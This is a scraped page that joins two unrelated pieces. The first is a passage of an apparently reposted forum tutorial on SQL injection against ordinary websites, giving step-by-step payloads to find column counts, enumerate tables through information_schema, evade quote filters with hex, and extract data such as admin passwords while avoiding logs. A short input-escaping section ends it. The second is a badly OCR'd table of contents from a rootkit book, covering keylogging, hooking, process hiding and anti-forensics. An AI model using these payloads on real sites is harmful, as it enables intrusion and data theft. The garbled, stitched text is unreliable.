Also try 'a'='a and "a"="a instead of 1=1 (yes without the last ' and ") Examples: '+and+1=1 '+and+1=1/* "+and+'a'='a '+and+"a"="a [...] If you after using at least one of the above techniques got no indications that the page could be vulnerable. It probably is not vulnerable. Find a new URL! PS: If you actually learn MySQL syntaxes and SQL logic you wont have to do as much trial and error as I have described in the techniques above. You will understand how/why the different prefixes does and when they are necessary/required/possible. 1.4 Exploiting vulnerabilities Once you have found a vulnerable link it is pretty straight forward. (Well, can be at least. Your injection could be blind and that will make your life a lot harder. Blind injections are NOT covered in this tutorial.) Just a quick description of blind SQL injection(Credits to owasp.org) Quote Overview When an attacker executes SQL Injection attacks, sometimes the server responds with error messages from the database server complaining that the SQL Query's syntax is incorrect. Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application, rather then getting a useful error message, they get a generic page specified by the developer instead. This makes exploiting a potential SQL Injection attack more difficult but not impossible. An attacker can still steal data by asking a series of True and False questions through SQL statements. Back to our vulnerable link. It is a good idea to try to visualize what the SQL query looks like. In this case it is pretty easy. But in more advance injections this really helps out. So again, the query looks like this: Code: [select] SELECT * FROM articles WHERE id='ID'<-INJECTION GOES HERE The first thing we need to do is find out how many column it is in the table 'articles'. This is because we are going to use the UNION ALL SELECT command. What this UNION ALL SELECT command does is that it allows you to SELECT something in the database two times within the same query, it will then return the data of both the SELECT commands as if it was one query. So.. In this case we know that the table got 3 columns(ID, subject, text). If we don't know this, there are two things you can do. You can do it by using the ORDER BY command or you can just try it out to your query works. However, I would normally go for the ORDER BY command as this does not create lots of nasty logs and its faster if its more than 5 columns or so. The ORDER BY command does exactly what it sounds like. It orders things alphabetically, numeric or by date/time. It can order by name or offset of a column. That means you can do ORDER BY ID or ORDER BY 1, this will be the same if the column ID is the first column. That again means that we can find out how many columns the table got by trying to order by offsets until we get a error or blank page starting at something like 5. So here we go: TIP: Use + instead of space, makes it much cleaner. Evilzone - Hacking and Security Community - Index : Returns blank page Evilzone - Hacking and Security Community - Index : Returns normal page Evilzone - Hacking and Security Community - Index : Returns blank page Evilzone - Hacking and Security Community - Index : Returns normal page Okay, so 4 is to high and 2 is to low because 3 obviously worked. Now we know the table got 3 columns! Now we are almost ready to start getting some juicy data. But I have kinda cheated for you guys. Because normally we don't know what the names of the columns are, I just said they are named ID, subject and text. So we need to look this up. Before we can look up what the column names are, we need to find out what version of MySQL the server are running. Newest one are 5.*** and the one you MIGHT come by is 4.*** We can use the UNION ALL SELECT command already, however its pointless for data extraction without the column names(actually its not even possible). But we can get the version without the names. This is what you need to do now: Evilzone - Hacking and Security Community - Index There we go, now we used the UNION ALL SELECT command. We do 1,2,3 because it is 3 columns. If it was 5 you will have to do 1,2,3,4,5 and so on... The page now should/may output "2" as subject and "3" as the article text. 1 is should not be there because the ID is probably not printed to the page. If the page outputs "2" and "3", then great! Skip past the next text block. If not read this; The UNION ALL SELECT doesn't replace the first SELECT so in some cases(depending on the PHP code) we have to cause an select that will select nothing first. What we can do then is put something like 99999 instead of 17. This will return nothing because article NR 99999 doesn't exist(just make sure 99999 really does not exist ). But the union all select will return 1,2,3 and this will be printed to the page instead. Our page now outputs "2" as subject and "3" as article text. We can now find out what version they are running. This is how you do that: Evilzone - Hacking and Security Community - Index Now the text("3") will be replaced with the information about what version they are running. If the version query returns as 5.*** then you can skip the next block of text, if it returns 4.*** read this; In the MySQL version V4 they did not have the database called 'information_schema' which in V5 contains all information about all tables and columns(names, ids and more). That means, in V4 it is impossible to find out the table and column names, the only way to then get any data out is by guessing the table/column names which is time consuming and may create a lot of logs... If you wish to continue the injection, you should read through the rest and then understand how to guess the names. There are programs to brute force the table and column names. ------------------------------------------- Okay, before we continue now. I just want to get something of my heart. If you are getting errors from even trying to UNION ALL SELECT anything. And are either getting error messages that says something like "wrong type" or something like that, or are just getting blank page/redirection: If the table of the first SELECT command in a query you are trying to UNION ALL SELECT is built in such a way that, lets say the first two columns are set to be numbers, and the last one is set to be a text value(I am using 3 columns because thats what we are dealing with here). You have to follow that pattern in the UNION ALL SELECT command too. So if the first SELECT is 2x columns of type number and then a text column, your UNION ALL SELECT command have to be alike(UNION ALL SELECT 1,2,'text'). Which means for us that we cannot use the 2 number in the query to get text information from the SQL server. But we will continue this tutorial as if the columns we are using wont create any errors. We can now "ask" the database 'information_schema' for the column names. The 'information_schema' database contains a table called 'tables' and a table called 'columns'. The table 'tables' inside the database information_schema contains information about all the tables within all the databases on the server. So to find table names you can "ask" the table 'tables' in the database 'information_schema'. The table 'columns' in the database 'information_schema' contains information about all the columns inside all the tables in all the databases on the server. So to get column names you can "ask" the table 'columns' in the database 'information_schema'. Note: The table 'columns' in 'information_schema' also contains table names, therefore we can get both column and table names with one query if we want to. But before we can ask the 'column' table for column names we need to know what table we want to extract information from. You do that by asking the table 'tables' in the database 'information_schema' for table names. But when doing this without any more requirements than just "give me everything" to the SQL server, it will return ALL table names in the entire server. And that can be a lot on large servers. So.. We need to specify our question to the table a bit better. To get all table names in a specific database you do this: Code: [select] Evilzone - Hacking and Security Community - Index' This will ask the table 'tables' in 'information_schema' for all table names where the database name is 'DatabaseName'. Remember, databases consists tables, so each table will always have a owner database. To ask it for all table names in the current database, the one already used by the original query you do this: Code: [select] Evilzone - Hacking and Security Community - Index to code tag them because they fucked up the formating) The variable database() represents the database in use by the first SELECT command in the query. TIP: schema means database Again, before we continue now. I have to make an important note. If your injections are failing when you have 's or "s in them, you have to convert your arguments to HEX. A lot of things in MySQL can be represented at HEX instead. When you want to represent things as HEX you simply remove the 's or "s and put 0xHEX_NMBERS instead. The 0x will indicate to the MySQL server that the value is a HEX string. Here is the above link that contained 's in HEX version: Code: [select] Evilzone - Hacking and Security Community - Index An excellent online text to HEX converter: Convert String To Hexadecimal Online Continuing... Now, where the number "3" or where originally the article text was it should now be a table name. Lets say this database contains the tables: Quote articles users log Then you should see 'articles' because it is the first table. Okay, so we know the database got a table called 'articles', lets check that one out. Now we need to get the column names for the table 'articles'. To get the column names of a table you do this: Code: [select] Evilzone - Hacking and Security Community - Index' Note the 's in the query, remember what I wrote about 's and HEX. Okay, lets break it down a bit. Now we have used the UNION ALL SELECT command and we asked the database 'information_schema' if it got a table called 'columns', and it did, so we asked the table 'columns' if it could give us all the names of the columns in the table called 'articles' BTW, the concat() will return everything inside it as a merged value. Example: concat('h', 'e', 'll', 'o') will return hello. Concat() is not needed in this query but its a good idea to learn how to use it, as you will need it later. The place where the number "3" used to be or the place where the article text is when using the page normally should now have a name in it. In this case it should have the value 'ID'. This is because the column name 'ID' is the first column in the table 'articles'. So now we know one of the column names in the table. To get the rest we have to use the LIMIT command. The LIMIT command will return a limited/selected amount of rows from a table. Example: We got a table with only one column, the column is called ID. We got 10 rows: ____ |ID_| |_1_| |_2_| |_3_| |_4_| |_5_| |_6_| |_7_| |_8_| |_9_| |_10| If we do: Code: [select] SELECT * FROM TheTableAbove LIMIT 0,5 It will return the row 1 to 5 If we do: Code: [select] SELECT * FROM TheTableAbove LIMIT 5,5 It will return the row 5 to 10 Now, back to getting the column names. Lets try to get column name NR 2, NR 1 is 'ID', we got that from the previous query. Code: [select] Evilzone - Hacking and Security Community - Index This should return the name 'subject'. This is because the columns 'subject' is columns NR 2. So by limiting the result from result 1(0 is the first) and then give us the next 1 result(s) we get 'subject'. To get the last column name we limit it 2,1. Code: [select] Evilzone - Hacking and Security Community - Index This should return 'text'. Again this is because we now are limiting the results from the server by row NR 2 and asks for the 1 next result(s). Alright, so the situation is: We want to check out a table called 'articles'. We got the table name from asking the table 'tables' in the database 'information_schema' The table 'articles' got these columns: ID | subject | text We got the column names from asking the table 'columns' in the database 'information_schema' for all column names in the table 'articles' Now! All we need to do is extract what we want. All through this table 99% likely is not interesting at all we now are gonna try to extract all the info out of article NR 23, this is because we act like that article is for admins only, but we want to read it anyway. To extract information you do like this: Code: [select] Evilzone - Hacking and Security Community - Index, subject, text)+FROM+articles+WHERE+ID=23 Now you will see a almost normal looking article, however the subject will still be “2”. But the text will now look like this(Lets say that the subject is “admin passwords” and the text is “abcabcabc”): Quote 23admin passwordsabcabcabc This is because we asked for the ID which is 23, then the subject which is "admin passwords" and then the text which is "abcabcabc". This is a bit messy.. So lets try to clean things up by splitting the 3 columns with a '<br /><br />': Code: [select] http://evilzone.org/index.php?id=17+UNION+ALL+SELECT+1,2,concat(ID,'<br /><br/>',subject,'<br /><br />',text,'<br /><br />')+FROM+articles+WHERE+ID=23(Remember the HEX thing? Most likely you will have to use that here.) HEX version: Code: [select] Evilzone - Hacking and Security Community - Index Now you will see this: Quote 23 admin passwords abcabcabc I know this information wasn't all that interesting but this is basically how you do it! Lets say you want to check if the database got a user information table. Then you simply use the limit command on the: Quote http://evilzone.org/index.php?id=17+UNION+ALL+SELECT+1,2,concat(table_name)+FROM+information_schema.tables+WHERE+table_schema='DatabaseName' OR Quote http://evilzone.org/index.php?id=17+UNION+ALL+SELECT+1,2,concat(table_name)+FROM+information_schema.tables+WHERE+table_schema=database() And repeat the whole process all over again. Okay. I have a confession to make. The method you guys learned now is the very hard way. But I wanted you to know how to do it that way because sometimes its necessary. And I know you would have just skipped to the easy version if I told you earlier To now we have used the concat() function to group up different columns into one. But this does not limit the amount of rows the SQL server returns. So (depending on the PHP code) we will only get the first row of the returned results printed to the page. Depending on the PHP code, if it is coded in such a way that it will only output the first row or if it will loop thought all the rows and print them out. Either way, I will introduce you to a new function. The group_concat() function. This will not only allow you to group up multiple columns and values into one, but also grouping up rows so you don't have to use the LIMIT at the end and send a million requests. However, I must warn you. The group_concat default max length is only 1024 characters. Thats why its very often necessary doing it the hard way, with LIMIT. If the returned value is more than 1024 characters the rest will just be discarded. nonetheless. This is how you do it: Remember the 'article' table from above? Well, lets try getting all its column names from the 'information_schema.columns' instead of doing LIMIT: Code: [select] Evilzone - Hacking and Security Community - Index' This should now return as: Quote ID,subject,text Now we have gotten the same amount of information that we had to send three requests for last time in one request! This method can be used in all the other queries above to. 1.5 Securing vulnerabilities What every PHP coder(and any other web page coder) should ALWAYS do: strip/check/secure ALL user inputs! Instead of doing: Code: [select] $variable = $_GET['Some_user_input_name']; Do: Code: [select] $variable = mysql_real_escape_string($_GET['Some_user_input_name']); The mysql_real_escape_string() function will prohibit any escape character (' or " or \ etc) to do any damage. And therefore an injection is impossible. And remember to use ' around the variable like this: Code: [select] db_query("SELECT * FROM Somewere WHERE Something='".$variable."'); Use of the is_numeric() function where the inputs are always going to be numbers either way is also a good idea. And also check the number length, your number should never be so high that it stats using e's (51.315+315e). So a simple if (num > 99999999999) {die;} will work fine. Other inputs are: Quote $_POST[''] $_COOKIE[''] $_FILES[''] $_REQUEST[''] $_SESSION[''] It is so god damn easy so why people do not do it is a mystery to me. Sursa: SQL Injection

The Rootkit Arsenal Escape and Evasion in the Dark Corners of the System Reverend Bill Blunden Preface: Metadata . . . . . . . . . . . . . . . . . . . . . . . . . . . . . XIX Part 1- Foundations Chapter 1 Chapter 2 Setting the Stage . ........ ..... .. .. . 1.1 Forensic Evidence 1.2 First Principles. . . . . . . . . . . . . . . . . . . . . . Semantics ....... ... ... ......... .. . Rootkits: The Kim Philby of System Software . . . . Who Is Using Rootkit Technology? The Feds .. The Spooks .... .. . The Suits .... ... . 1.3 The Malware Connection. Infectious Agents . . . Adware and Spyware . . . Rise of the Botnets . . . . Malware versus Rootkits . Job Security: The Nature of the Software Industry . 1.4 Closing Thoughts. . . . . . . . . . . . . . . Into the Catacombs: IA-32 . . . . . . . . . . . . . . 2.1 IA-32 Memory Models. Physical Memory . . . . . . Flat Memory Model. . . . . Segmented Memory Model Modes of Operation. . 2.2 Real Mode. . . . . . . . . . Case Study: MS-DOS .... Isn't This a Waste of Time? Why Study Real Mode? . The Real-Mode Execution Environment Real-Mode Interrupts .. .... .. . Segmentation and Program Control . . . Case Study: Dumping the IVT . . . . . . Case Study: Logging Keystrokes with a TSR . Case Study: Hiding the TSR . . . . . . . . . . · ..... 3 .3 · . ..... 8 · . .. ... 9 .. 11 · 13 · 13 · 13 · 15 · 15 · 16 · 17 · 17 · 19 · 19 · 21 ... . 23 . 24 · 25 . 27 · 27 . 28 .29 . 30 . ..... 32 . 33 · 35 .38 .40 · 41 .45 v (ontents Chapter 3 vi Case Study: Patching the tree.com Command Synopsis ........ .... ..... .. . . 2.3 Protected Mode. . . . . . . . . . . . . . . . . The Protected-Mode Execution Environment. Protected-Mode Segmentation ..... . Protected-Mode Paging ......... . Protected-Mode Paging: A Closer Look . 2.4 Implementing Memory Protection .... Protection through Segmentation . . . . Limit Checks . . . Type Checks . . . . . . . . . . Privilege Checks. . . . . . . . Restricted-Instruction Checks Gate Descriptors . . . . . . . . . Protected-Mode Interrupt Tables Protection through Paging . . Summary . .............. . Windows System Architecture . • . . . • • . . . . . 3.1 Physical Memory . . . . . . . . . . Physical Address Extension (PAE) . . . Data Execution Prevention (DEP) .... Address Windowing Extensions (AWE) . Pages, Page Frames, and Page Frame Numbers 3.2 Memory Protection . Segmentation . . . . . . . . . . . . . .. .... . Paging . . . . . . . . . . . . . . . . . .. . ... . Linear to Physical Address Translation . Longhand Translation . . . A Quicker Approach . . . . Another Quicker Approach 3.3 Virtual Memory . . . . . . . . User Space Topography . ... Kernel Space Dynamic Allocation . Address Space Layout Randomization (ASLR) . 3.4 User Mode and Kernel Mode . How versus Where . . . . Kernel-Mode Components User-Mode Components 3.5 The Native API .. .. . . The IVT Grows Up ... . Hardware and the System Call Mechanism System Call Data Structures . . The SYSENTER Instruction. . . . . . . .... 50 .. .. 53 · .54 .54 .57 · 61 .63 . 66 · 67 .67 · .68 .68 .69 .70 · 73 . 74 .76 ..... 79 .80 · 81 .82 .82 .83 .83 .84 .86 · 91 · 91 .92 .93 .93 .96 · .97 · .98 100 100 101 103 · 105 · 106 · 107 108 . ..... 109 Chapter 4 The System Service Dispatch Tables . Enumerating the Native API . . . Nt*O versus Zw*O System Calls. The Life Cycle of a System Call . Other Kernel-Mode Routines . .. Kernel-Mode API Documentation 3.6 The Boot Process . . . . . . Startup for BIOS Firmware . . Startup for EFI Firmware. . . The Windows Boot Manager . The Windows Boot Loader . Initializing the Executive. The Session Manager . Wininit.exe. . . . . Winlogon.exe. . . . The Major Players. 3.7 Design Decisions . How Will Our Rootkit Execute at Run Time? . What Constructs Will Our Rootkit Manipulate? . Rootkit Basics . . . . 4.1 Rootkit Tools .... Development Tools Diagnostic Tools . . Reversing Tools . . Disk Imaging Tools Tool Roundup. . . . 4.2 Debuggers. . . . . Configuring Cdb.exe . Symbol Files . . . Windows Symbols. Invoking Cdb.exe . . Controlling Cdb.exe . Useful Debugger Commands. Examine Symbols Command (x) . List Loaded Modules (1m and !lmi) Display Type Command (dt) . Unassemble Command (u) . Display Command (d*) . . . Registers Command (r) .. . The Kd.exe Kernel Debugger Different Ways to Use a Kernel Debugger . . Configuring Kd.exe . . . . Preparing the Hardware . . . . . . . . . . Contents 110 113 114 116 119 122 124 124 126 126 127 130 132 134 134 · 134 · 136 137 · . 138 .... 141 142 · 142 · 143 · 144 145 147 148 150 · 150 · 151 · 153 · 154 · 155 155 157 158 158 159 161 161 · . 162 · 164 · . 164 vii Contents viii Preparing the Software. . . . . . . . . . ' . Launching a Kernel Debugging Session . . . Controlling the Target. . . . . . . . . . . . . Useful Kernel-Mode Debugger Commands .. List Loaded Modules Command (1m) !process ... ... ... . . Registers Command (r) .. . Working with Crash Dumps . . Method 1 . ..... . Method 2 ..... .. . Crash Dump Analysis .. 4.3 A Rootkit Skeleton. . . . . Kernel-Mode Driver Overview. A Minimal Rootkit . Handling IRPs . DeviceType . Function . Method .. . Access .. . . Communicating with User-Mode Code Sending Commands from User Mode Source Code Organization .. . Performing a Build ... ... . WDK Build Environments . Build.exe ... ...... . 4.4 Loading a KMD . .... .. . The Service Control Manager (SCM) . Using sC.exe at the Command Line . Using the SCM Programmatically . Registry Footprint . . . . . . . . . . ZwSetSystemInformationO. . . . . . . . . Writing to the \Device\PhysicaIMemory Object. Modifying Driver Code Paged to Disk . Leveraging an Exploit in the Kernel . 4.5 Installing and Launching a Rootkit. . . Launched by the Operating System . . Launched by a User-Mode Application. Use the SCM . ...... ... .... ... .. . . .. 166 168 169 170 170 · .. .. 171 · . .. . 173 · .... 173 · 174 · 175 175 176 176 178 181 · 185 · 186 · 186 · 186 187 190 193 194 194 · 195 198 · 198 · 199 .200 .202 . 203 . 208 .208 · 210 · 210 · 211 · 212 . . . . . . . 212 Use an Auto-Start Extensibility Point (ASEP) .. ....... 213 Install the Launcher as an Add-On to an Existing Application . 215 Defense in Depth . . . 216 Kamikaze Droppers . . 216 Rootkit Uninstall. . . . 219 Contents 4.6 Self-Healing Rootkits ..... . ... . .. .. .... .... .. 220 Auto-Update . . . . . ..... . . .... . .. ... .. .. ... 224 4.7 Windows Kernel-Mode Security . .. . . .... ... . . .. . . 225 Kernel-Mode Code Signing (KMCS) .... . ... .... .... 225 Kernel Patch Protection (KPP) . . . . . . . . . . . . . . . . . . . 229 Restricted Access to \Device\PhysicaIMemory . . . . . . . . . . 230 4.8 Synchronization . . . . . . . . . . . . . . . . . . . . . .. . . 230 Interrupt Request Levels . . . . . . . . . . .. . .. 230 Deferred Procedure Calls (DPCs) . . . . . .. ... . . . . . 234 Implementation . . . . 235 4.9 Commentary. . . . . . . . . . . . . . . . . . . . . ... . . .. 240 Part II - System Modification Chapter 5 Hooking Call Tables. . . . . . . . . . . . . . . . . . . . . . 243 5.1 Hooking in User Space: The lAT .... . . . . ... . . . . . . . 245 DLL Basics ........ ..... . .... .. ... .. ..... 246 Accessing Exported Routines. . . . .. . 247 Load-Time Dynamic Linking . . . . . . 248 Run-Time Dynamic Linking . . . .. . 249 Injecting a DLL . . . . . . . . . . . 250 The AppInit_DLLs Registry Value. . 250 The SetWindowsHookExO API Call . . 251 Using Remote Threads . . . . . . . . . 252 PE File Format . . . . . . . . . . . . . . . 255 The DOS HEADER. .... .. . .... .. . .. .. 255 RVAs .... ..... . .. . .... . ...... . . .... .. 256 The PE Header . . . . . . . . . . . . . . . . . . . . . . . . . . 257 Walking through a PE on Disk . . . . . . . . . . . . . . . . . . 260 Hooking the IAT .... .... . ... . ... . .... .... 265 5.2 Hooking in Kernel Space . . . . . . . . . . . . . . . . . . 269 Hooking the IDT. . . . . . . . . . . . . . . . . . . . . . . . . . . 270 Handling Multiple Processors - Solution 1 . . . . . . . . . . 271 Naked Routines . . . . . . . . . . . . . . . . . . . . . . . . . . 276 Issues with Hooking the IDT . . . . . . . . . . . . . . . . . . 278 Hooking Processor MSRs . . . . . . . . . . . . . . 279 Handling Multiple Processors - Solution 2 . . 282 Hooking the SSDT. . . . . . . . . . . . . . 286 Disabling the WP Bit - Technique 1 . . 288 Disabling the WP Bit - Technique 2 . . 289 Hooking SSDT Entries . . . . . . . . . . 291 SSDT Example: Tracing System Calls. . ... 293 SSDT Example: Hiding a Process. . . . . . . . . . . .... 296 ix Contents Chapter 6 x SSDT Example: Hiding a Directory . . . . . . . SSDT Example: Hiding a Network Connection. Hooking IRP Handlers . . . . . . . . . . . Hooking the GDT - Installing a Call Gate 5.3 Hooking Countermeasures . . . . . Checking for Kernel-Mode Hooks. Checking IA32 _ SYSENTER EIP. Checking INT Ox2E . . . Checking the SSDT . . . . . . . Checking IRP Handlers . . . . . Checking for User-Mode Hooks Parsing the PEB - Part 1. . Parsing the PEB - Part 2. . 5.4 Counter-Countermeasures . Patching System Routines. . . . . . . . . Binary Patching versus Run-time Patching The Road Ahead . . 6.1 Run-time Patching. Detour Patching . . Detour Jumps ... Example 1: Tracing Calls Detour Implementation. Acquire the Address of the NtSetValueKeyO . Initialize the Patch Metadata Structure . . . . · 301 .305 . 306 . 308 · 317 · 318 · 321 . 322 . 324 . 325 .327 .330 .336 .337 . .. . 339 . 340 .340 .340 · 341 .344 . 346 · 351 .354 .354 Verify the Original Machine Code against a Known Signature . 356 Save the Original Prolog and Epilog Code. Update the Patch Metadata Structure. . . Lock Access and Disable Write Protection Inject the Detours . The Prolog Detour . The Epilog Detour . Post-Game Wrap-Up Example 2: Subverting Group Policy. . . Detour Implementation. . . . . . . . . Initializing the Patch Metadata Structure . The Epilog Detour . . . . . . . . . . . . . Mapping Registry Values to Group Policies. Example 3: Granting Access Rights . . . Detour Implementation. . . . . . . . . . 6.2 Binary Patching . . . . . . . . . . . . . . . Subverting the Master Boot Record . . . . The MBR in Depth . The Partition Table . . . . . . . . . . . . . 357 . 357 .358 .358 .359 · 361 . 365 · ... 365 . 367 · . . . 367 · . . . 368 .373 . 374 . 376 . 379 .380 .380 . . 383 Patch or Replace? ... . .. . Hidden Sectors . . . . . . . . . Bad Sectors and Boot Sectors . Rogue Partition . MBR Loader ... IA-32 Emulation. . Vbootkit ... .. . 6.3 Instruction Patching Countermeasures . Contents .386 . 387 . 388 . 389 . 390 . 393 . 395 .399 Chapter 7 Altering Kernel Objects. . . . . . . . . . . . . . . . . . . . 401 7.1 The Cost of Invisibility . . . . . . . . 401 Issue 1: The Steep Learning Curve . . . . . 401 Issue 2: Concurrency . . . . . . . . . . . . . 402 Issue 3: Portability and Pointer Arithmetic . 403 Branding the Technique: DKOM . . . . . . . 405 Objects? ...... ... .. ... .. . ... .. ... . . ... 405 7.2 Revisiting the EPROCESS Object . . 406 Acquiring an EPROCESS Pointer . 406 Relevant Fields in EPROCESS . . 409 UniqueProcessId . . . 409 ActiveProcessLinks. . 410 Token . . . . . . . . . 411 ImageFileName . . . . 411 7.3 The DRIVER_SECTION Object. . 411 7.4 The TOKEN Object . . . . . . . 414 Authorization on Windows . . . . . 414 Locating the TOKEN Object. . . . 416 Relevant Fields in the TOKEN Object . . 418 7.5 Hiding a Process. . . . . . . . . . 422 7.6 Hiding a Driver . . . . . . . . . . 428 7.7 Manipulating the Access Token. . 432 7.8 Using No-FU . . . . . . . 434 7.9 Countermeasures . . . . . . . . . 436 Cross-View Detection . . . . . . . 436 High-Level Enumeration: CreateToolhelp32SnapshotO . . 437 High-Level Enumeration: PID Bruteforce . 439 Low-Level Enumeration: Processes. . 442 Low-Level Enumeration: Threads. . 444 Related Software. . . . . . . . 451 Field Checksums. . . . . . . . . . . . . 452 Counter-Countermeasures . . . . . . . 452 7.10 Commentary: Limits of the Two-Ring Model . 453 7.11 The Last Lines of Defense . . . . . . . . . . . 454 xi (ontents Chapter 8 Deploying Filter Drivers. . . . . . . . . . . . . . . . 8.1 Filter Driver Theory. . . . . . . . Driver Stacks and Device Stacks. . . . . . The Lifecycle of an IRP . . . . . . . . . . . Going Deeper: The Composition of an IRP IRP Forwarding . . . . . . . . . . IRP Completion . . . . . . . . . . . . . . . 8.2 An Example: Logging Keystrokes . . . . . The PS/2 Keyboard Driver and Device Stacks . Lifecycle of an IRP. . . . . . . . . . . . . . . Implementation . . . . . . . . . . . . . . . . 8.3 Adding Functionality: Dealing with IRQLs. Dealing with the Elevated IRQL . . Sharing Nicely: The Global Buffer . The Worker Thread . . . . . . . . . Putting It All Together . . . . . . . 8.4 Key Logging: Alternative Techniques . Set WindowsHookEx. . . . . . . . GetAsyncKeyState . . . . . . . . 8.5 Other Ways to Use Filter Drivers Part 111 - Anti-Forensics Chapter 9 xii Defeating Live Response . . . . . . . . . . . . . . . IDS, IPS, and Forensics . . Anti-Forensics .... Data Destruction . . Data Hiding . . . . . Data Transformation Data Contraception. Data Fabrication ... File System Attacks 9.1 The Live Incident Response Process The Forensic Investigation Process Collecting Volatile Data . . . Performing a Port Scan . . . . . . Collecting Nonvolatile Data .. .. The Debate over Pulling the Plug Countermeasures . . . . . . 9.2 RAM Acquisition .... .... . Software-Based Acquisition .. . KnTDD.exe. Autodump+ ..... . . .. . ... . 457 .458 .458 .460 . 461 .464 .465 .467 .467 .469 .470 . 475 .475 .477 .479 .483 . 484 .485 .488 .489 . . . . 493 . 494 .495 .496 . 496 .497 .497 .497 .497 .498 .498 .500 .504 .505 .508 .508 · . 509 · . 510 . 510 · .511 Chapter 10 LiveKd.exe . . . . . . . . . Crash Dumps . . . . . . . . Hardware-Based Acquisition. Countermeasures . . . . . . . Defeating File System Analysis. . . . . . 10.1 File System Analysis . .. Forensic Duplication . . . . Recovering Deleted Files . Enumerating ADSes . . . . Acquiring File Metadata . . Removing Known Good Files. File Signature Analysis . . . . Static Analysis of an Unknown Executable Run-time Analysis of an Unknown Executable 10.2 Countermeasures: Overview . .. . .. . 10.3 Countermeasures: Forensic Duplication . Reserved Disk Regions . . . . . . . . . . Live Disk Imaging. . . . . . . . . . . . . 10.4 Countermeasures: Deleted File Recovery. 10.5 Countermeasures: Acquiring Metadata Altering Timestamps . . . . . . . . . . . . Altering Checksums . . . . . . . . . . . . . 10.6 Countermeasures: Removing Known Files Move Files into the "Known Good" List . Introduce "Known Bad" Files . .. .. . . Flood the System with Foreign Binaries . Keep Off a List Entirely by Hiding . Out-of-Band Hiding .. . . .. . In-Band Hiding .. . . ... .... . Application Layer Hiding: M42 . . . 10.7 Countermeasures: File Signature Analysis 10.B Countermeasures: Executable Analysis . Foiling Static Executable Analysis . Cryptors ...... .. .. . . Encryption Key Management. . . . Packers . ....... .. . . . .. . Augmenting Static Analysis Countermeasures Foiling Run-time Executable Analysis . Attacks against the Debugger. . . . . Breakpoints . . . . . . . . . . . . . . Detecting a User-Mode Debugger . . Detecting a Kernel-Mode Debugger. Detecting a User-Mode or Kernel-Mode Debugger Contents · 513 · 513 · 514 · 515 ... . 517 · 517 · 519 · 521 · 521 . 523 .527 . 529 . 530 · 533 .537 · 538 .538 . 539 · 542 . 544 .544 .546 · 547 · 547 .548 . 548 . 549 . 549 . 555 .566 · 567 .568 .568 .571 . 580 · 581 · 583 · 585 .586 . 586 · 587 . 588 · 588 xi ii (ontents Chopter 11 xiv Detecting Debuggers via Code Checksums. . Land Mines .. . ...... . Obfuscation .......... . . Obfuscating Application Data. Obfuscating Application Code The Hidden Price Tag . . . . 10.9 Borrowing Other Malware Tactics . Memory-Resident Rootkits .... . Data Contraception . . . . . . . . . The Tradeoff: Footprint versus Failover . Defeating Network Analysis . . . . • . . . . . . . . 11 .1 Worst-Case Scenario: Full Content Data Capture .... 11 .2 Tunneling: An Overview . HTTP. DNS ........ . ICMP ....... . Peripheral Issues . 11.3 The Windows TCPIIP Stack Windows Sockets 2 . Raw Sockets . . . . . Winsock Kernel API . NDIS ...... . . . Different Tools for Different Jobs. 11 .4 DNS Tunneling. DNS Query . ... ....... . DNS Response . . . . . . . . . . 11.5 DNS Tunneling: User Mode ... 11 .6 DNS Tunneling: WSK Implementation. Initialize the Application's Context. .. Create a Kernel-Mode Socket . .... Determine a Local Transport Address . Bind the Socket to the Transport Address. Set the Remote Address (the C2 Client). Send the DNS Query . . . . Receive the DNS Response. . . . . . . . 11.7 NDIS Protocol Drivers . . . . . . . . . . Building and Running the NDISProt 6.0 Example. An Outline of the Client Code An Outline of the Driver Code The ProtocolxxxO Routines. Missing Features. . . . . . . . · 589 .590 .590 · 591 · 592 . 595 . 596 . 596 · 597 . 599 . . . . 603 . . . . . 604 . 605 .606 .607 .607 .609 · 610 .611 · 612 · 613 · 614 · 616 · 617 · 617 · 619 · 621 · 625 .632 .632 · 634 · 635 · 636 . 638 .639 · 641 · 642 . 646 .649 .652 .656 Chapter 12 Countermeasure Summary . . . 12.1 Live Incident Response . 12.2 File System Analysis . . 12.3 Network Traffic Analysis 12.4 Why Anti-Forensics? .. Port IV - End Material Chapter 13 Chapter 14 Appendix The Tao of Rootkits . . . . . . . Run Silent, Run Deep . . . . . . Development Mindset. . . . . . On Dealing with Proprietary Systems . Staking Out the Kernel . . . . . . . . . Walk before You Run: Patching System Code . Walk before You Run: Altering System Data Structures The Advantages of Self-Reliant Code Leverage Existing Work Use a Layered Defense .. . .. . Study Your Target . . . . . . . . . Separate Mechanism from Policy . Closing Thoughts . . . . . . . . . . . . . Chapter 2 ..... . . Project: KillDOS. . Project: HookTSR . Project: HideTSR . Project: Patch Chapter 3 . SSDT .. . . Chapter 4 ... . Project: Skeleton (KMD Component). Project: Skeleton (User-Mode Component) Project: Installer . Project: Hoglund. . . . . . . . . . . Project: SD .... . . .. .. .. . . Project: HBeat (Client and Server) . Project: IRQL . . . . . . Chapter 5 . ..... . . . . Project: RemoteThread . Contents · . . . 659 .660 . 662 . 663 .664 · .. . 669 . 669 . 670 · 670 .671 · 672 ... 672 · 673 · 675 · 675 . 676 · 676 · .. . 677 . 683 . 683 . 684 · 691 . 696 . 697 . 697 .710 · 710 · 714 · 721 . 724 .726 · 729 . 736 . 739 · 739 xv Contents xvi Project: ReadPE .. .. . ..... . .. .... ... 741 Project: HookIAT . . .... ... . . 746 Project: HookIDT . . . . . . . 750 Project: HookSYS . . . . . . . 756 Project: HookSSDT . . 760 Project: HookIRP . . . . . . . . . . 772 Project: HookGDT . .. ... . .. . 774 Project: AntiHook (Kernel Space and User Space) . . . . . . . . 779 Project: ParsePEB. . . . . . . . . . . . . . . . . . . . .. . . 790 Chapter 6 . . . . . . . . . . . . . . . . . . . . . . . . . . .. .. 793 Project: TraceDetour . . . . . 793 Project: GPO Detour . . . . . . . . 801 Project: AccessDetour. . . . . . . . . . 804 Project: MBR Disassembly . . . . . . . . . . . . 811 Project: LoadMBR. . . . . . . . . . . . . . . . . 813 Chapter 7 . . . . . . . . . . . .. ... .. .. . ... . .... 816 Project: No-FU (User-Mode Portion) .. .... . .... . .. . 816 Project: No-FU (Kernel-Mode Portion) . ... ... ....... 821 Project: TaskLister . . . 834 Project: findFU . . . . .. ... ............... . 838 Chapter 8 . . . . . . . . . .. .. ..... ...... . ... . . 843 Project: KiLogr-VOl . . . . .. . . . . .... . 843 Project: KiLogr-V02. . . .. ... .. . ..... 847 Chapter 10 . . . . . . . . . .. . . . .. . . . . . . 854 Project: 